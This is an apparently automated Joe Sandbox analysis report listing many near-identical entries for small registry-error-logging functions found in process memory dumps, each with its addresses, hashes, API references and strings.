Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 5cff05381c3f7f1274eebad37c756cae9790040e27bf0f6e9d7a1543ffd313dc
Instruction ID: 6324edb7e2bc6f9443e99f1f48a1bfb3efd65f1eb5ea74148476ea89f8ac7623
Opcode Fuzzy Hash: 5cff05381c3f7f1274eebad37c756cae9790040e27bf0f6e9d7a1543ffd313dc
Instruction Fuzzy Hash: DAF0F622609A0642EA52DF02BC403F92254EF447B4F080276ED1D466F0EFADEA498300

Function 00007FFE126E9E08 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE126E9D9D

Part of subcall function 00007FFE126E2072: fwrite.MSVCRT ref: 00007FFE126E211E
Part of subcall function 00007FFE126E2072: fflush.MSVCRT ref: 00007FFE126E212A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE126E9DED
registry_get_value, xrefs: 00007FFE126E9DE6

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: a99d3e96cd9d8798622bd175c7a81bf87decf0b9520b466e5d09dfbd9c86fb8f
Instruction ID: b15f9d459cd66eff272362169195e948a566319ebfb0c6c41aad186d2db00ee6
Opcode Fuzzy Hash: a99d3e96cd9d8798622bd175c7a81bf87decf0b9520b466e5d09dfbd9c86fb8f
Instruction Fuzzy Hash: A8F0F622609B0642EA52DF02BC403F92154FF447B4F080275ED5D466F0EFADE9898300

Function 00007FFE1A52D69E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1A52D6BD

Part of subcall function 00007FFE1A5277A2: fwrite.MSVCRT ref: 00007FFE1A52784E
Part of subcall function 00007FFE1A5277A2: fflush.MSVCRT ref: 00007FFE1A52785A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1A52D70D
registry_get_value, xrefs: 00007FFE1A52D706

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: c429d72c34a97fbf486d0a496476be34e1da0afc766eba340cf7d1912e4eb84c
Instruction ID: 6fa8494773e51bc4c8d41d548a5a58188399982c4e767b50b2ee7adb36629b9b
Opcode Fuzzy Hash: c429d72c34a97fbf486d0a496476be34e1da0afc766eba340cf7d1912e4eb84c
Instruction Fuzzy Hash: 59F0F663B0CE46C6E5529F42B8403BA2255EF82BB4F4801F7ED4D466B0DF2DD9898300

Function 00007FFE1A52D6AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1A52D6BD

Part of subcall function 00007FFE1A5277A2: fwrite.MSVCRT ref: 00007FFE1A52784E
Part of subcall function 00007FFE1A5277A2: fflush.MSVCRT ref: 00007FFE1A52785A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1A52D70D
registry_get_value, xrefs: 00007FFE1A52D706

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: df2f9d6ef0c891b281276911fe4f1952ca46b6bb0ac4f645e01c49f1e640ec4f
Instruction ID: 883c1ed6f925ca25575804ce74e12fa7dd3d6ffe24d2cc572035f74f4338b659
Opcode Fuzzy Hash: df2f9d6ef0c891b281276911fe4f1952ca46b6bb0ac4f645e01c49f1e640ec4f
Instruction Fuzzy Hash: 32F0F663B0CE46C6E5529F42B8403BA6255EF82BB4F4801F7ED4D866B0DF2DD9898300

Function 00007FFE1A52D728 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1A52D6BD

Part of subcall function 00007FFE1A5277A2: fwrite.MSVCRT ref: 00007FFE1A52784E
Part of subcall function 00007FFE1A5277A2: fflush.MSVCRT ref: 00007FFE1A52785A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1A52D70D
registry_get_value, xrefs: 00007FFE1A52D706

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 957c23676379ab83da7d228dc67bb8f830d43e6c61dd12aba3f6dd6ab3220d3c
Instruction ID: 63eb4417c3bbab43f1d97d23cef92dae48b84e81e7306c84eb7c6a82dcc3eec9
Opcode Fuzzy Hash: 957c23676379ab83da7d228dc67bb8f830d43e6c61dd12aba3f6dd6ab3220d3c
Instruction Fuzzy Hash: 18F0C263B0CA4682E6528B42B8403BA2255AF82BB4F0802F7ED4D466A0DF2DD9899300

Function 00007FFE1A52D60D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1A52D6BD

Part of subcall function 00007FFE1A5277A2: fwrite.MSVCRT ref: 00007FFE1A52784E
Part of subcall function 00007FFE1A5277A2: fflush.MSVCRT ref: 00007FFE1A52785A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1A52D70D
registry_get_value, xrefs: 00007FFE1A52D706

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 5eb64188fb564de82c88d2f083ff461c1ce3bdb0de117112952c86aac17cdd41
Instruction ID: 20e6f1e37d10f19f3f34bb060ba4c02725da4f944417990e4cf6d41cbf6c9c39
Opcode Fuzzy Hash: 5eb64188fb564de82c88d2f083ff461c1ce3bdb0de117112952c86aac17cdd41
Instruction Fuzzy Hash: DCF0F663B0CF46C6E5529F42B8403BA2255EF82BB4F4802F7ED4D466B0EF2DD9898300

Function 00007FFE1A52D617 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1A52D6BD

Part of subcall function 00007FFE1A5277A2: fwrite.MSVCRT ref: 00007FFE1A52784E
Part of subcall function 00007FFE1A5277A2: fflush.MSVCRT ref: 00007FFE1A52785A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1A52D70D
registry_get_value, xrefs: 00007FFE1A52D706

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 5ebb3171ee6302a649f837a2fda9caeed4ecd5e739653774abbafd5783d5ca14
Instruction ID: 54d968a3d4f8242997cbe488c4ba63e431d8d26fe4faee8ece0ffdfe26373b37
Opcode Fuzzy Hash: 5ebb3171ee6302a649f837a2fda9caeed4ecd5e739653774abbafd5783d5ca14
Instruction Fuzzy Hash: 0AF0C263B0CA4686E5529B42B8403BA2255AF82BB4F4801F7ED4C466A0DF2DD9898300

Function 00007FFE1150361D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE115036CD

Part of subcall function 00007FFE115040D2: fwrite.MSVCRT ref: 00007FFE1150417E
Part of subcall function 00007FFE115040D2: fflush.MSVCRT ref: 00007FFE1150418A

Strings

registry_get_value, xrefs: 00007FFE11503716
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1150371D

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 413746e8027013c1450730f39d7e9be24e345dca81f69a7540d0a3d601879d43
Instruction ID: bd04ac6ad774527fd5615eeea48a5980e77ab75ce038933ea664126c7b5494f8
Opcode Fuzzy Hash: 413746e8027013c1450730f39d7e9be24e345dca81f69a7540d0a3d601879d43
Instruction Fuzzy Hash: E8F0C222A0DA0A45E7928F41B84037A625DBF407B8F4802B9DD0D4B2B1EF3CDA4A8300

Function 00007FFE11503627 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE115036CD

Part of subcall function 00007FFE115040D2: fwrite.MSVCRT ref: 00007FFE1150417E
Part of subcall function 00007FFE115040D2: fflush.MSVCRT ref: 00007FFE1150418A

Strings

registry_get_value, xrefs: 00007FFE11503716
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1150371D

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 6ca835e196098e12a374f1654ece0a39f264962d4e65761b7f250adc6ffd05d5
Instruction ID: 740830b82ec4e036a39f6256621885a1e8d0f4798a362d82c7041ed0488a2a02
Opcode Fuzzy Hash: 6ca835e196098e12a374f1654ece0a39f264962d4e65761b7f250adc6ffd05d5
Instruction Fuzzy Hash: D8F0C222A0DA0A45E7928F41B84037A625DBF407B4F4801B9DD0C4B2B1EF3CDA4A8300

Function 00007FFE115036BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE115036CD

Part of subcall function 00007FFE115040D2: fwrite.MSVCRT ref: 00007FFE1150417E
Part of subcall function 00007FFE115040D2: fflush.MSVCRT ref: 00007FFE1150418A

Strings

registry_get_value, xrefs: 00007FFE11503716
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1150371D

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 3e990f831b1a7271ae6404353364ba871073f3c36765afa4535ce2bc8a34e3de
Instruction ID: 3986153a2b54f5293a1322fa42773888274616556fab4afd6192084d7b6df300
Opcode Fuzzy Hash: 3e990f831b1a7271ae6404353364ba871073f3c36765afa4535ce2bc8a34e3de
Instruction Fuzzy Hash: 6EF0FC12A0DE0645E7528F41B84037E615DBF407B4F4801B9DD0D476B1DF3CD9498300

Function 00007FFE115036AE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE115036CD

Part of subcall function 00007FFE115040D2: fwrite.MSVCRT ref: 00007FFE1150417E
Part of subcall function 00007FFE115040D2: fflush.MSVCRT ref: 00007FFE1150418A

Strings

registry_get_value, xrefs: 00007FFE11503716
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1150371D

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: af9ae2ecaaf6f118344d3800ee307e97f55ccdff598e542353bd9f7bfe661342
Instruction ID: 56708ff43dbfb5680ccd917bc35623098c6bcea09e653ae6de4f07c6fb3842d3
Opcode Fuzzy Hash: af9ae2ecaaf6f118344d3800ee307e97f55ccdff598e542353bd9f7bfe661342
Instruction Fuzzy Hash: 41F0C222A0DA0A45E7928F41B84037A625DBF407B8F4801BADD0D4B2B1EF3CDA4A8300

Function 00007FFE11503738 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE115036CD

Part of subcall function 00007FFE115040D2: fwrite.MSVCRT ref: 00007FFE1150417E
Part of subcall function 00007FFE115040D2: fflush.MSVCRT ref: 00007FFE1150418A

Strings

registry_get_value, xrefs: 00007FFE11503716
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1150371D

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: c6950ea80fd3833b33375c734f29831daf092845128eca107685d6ee46c9cab3
Instruction ID: d2d2ac15bf10a6663f952151cf2194f2f84c9c15f42b890fb1b302571dac5e4c
Opcode Fuzzy Hash: c6950ea80fd3833b33375c734f29831daf092845128eca107685d6ee46c9cab3
Instruction Fuzzy Hash: 73F0C222A0DA0A45E7928F51B84037A629DBF407B8F4802B9DD4D476B1EF3CDA8A9300

Function 00007FFE11EC363C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE11EC364D

Part of subcall function 00007FFE11EC9DC2: fwrite.MSVCRT ref: 00007FFE11EC9E6E
Part of subcall function 00007FFE11EC9DC2: fflush.MSVCRT ref: 00007FFE11EC9E7A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11EC369D
registry_get_value, xrefs: 00007FFE11EC3696

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: dfc3d5452ae4924382ea6fe93a0fbf9d4bc3aad60b172f611cf4cb8f220826fa
Instruction ID: 865976c47217a6dc972fc020065fe6f52cc4c7c658cfc36007e6b4143e060c49
Opcode Fuzzy Hash: dfc3d5452ae4924382ea6fe93a0fbf9d4bc3aad60b172f611cf4cb8f220826fa
Instruction Fuzzy Hash: 49F09C13A0CA4641E752DF91BC403B7625CAF407B4F840175DD5D467E0DF2DFA459700

Function 00007FFE11EC362E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE11EC364D

Part of subcall function 00007FFE11EC9DC2: fwrite.MSVCRT ref: 00007FFE11EC9E6E
Part of subcall function 00007FFE11EC9DC2: fflush.MSVCRT ref: 00007FFE11EC9E7A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11EC369D
registry_get_value, xrefs: 00007FFE11EC3696

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: b4c4cdc361995d3af475825b5b9592a90d7172a47e3cb3fd7d6a7c25dfe11def
Instruction ID: 7648a2f62bd943bcb222eb3cf26851344e859881db3804f4df7d160461e922a0
Opcode Fuzzy Hash: b4c4cdc361995d3af475825b5b9592a90d7172a47e3cb3fd7d6a7c25dfe11def
Instruction Fuzzy Hash: FEF06223A08A4641EB52DF91BC403BB625CAF407B4F880176DD5D466E0EF2DFA8A9300

Function 00007FFE11EC35A7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE11EC364D

Part of subcall function 00007FFE11EC9DC2: fwrite.MSVCRT ref: 00007FFE11EC9E6E
Part of subcall function 00007FFE11EC9DC2: fflush.MSVCRT ref: 00007FFE11EC9E7A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11EC369D
registry_get_value, xrefs: 00007FFE11EC3696

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 167771c8c1c4554efda54008c580c9ff860e930fcaca6236bde73388e3653b50
Instruction ID: bf70345671271f3e6e3ebcbe30e483ba29fe51fc68d351a34719ec48912e5856
Opcode Fuzzy Hash: 167771c8c1c4554efda54008c580c9ff860e930fcaca6236bde73388e3653b50
Instruction Fuzzy Hash: BAF09623A0CA4641EB52DF91BC403BB625CBF407B4F880175DD5D466E0EF2DFA8A9300

Function 00007FFE11EC359D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE11EC364D

Part of subcall function 00007FFE11EC9DC2: fwrite.MSVCRT ref: 00007FFE11EC9E6E
Part of subcall function 00007FFE11EC9DC2: fflush.MSVCRT ref: 00007FFE11EC9E7A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11EC369D
registry_get_value, xrefs: 00007FFE11EC3696

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
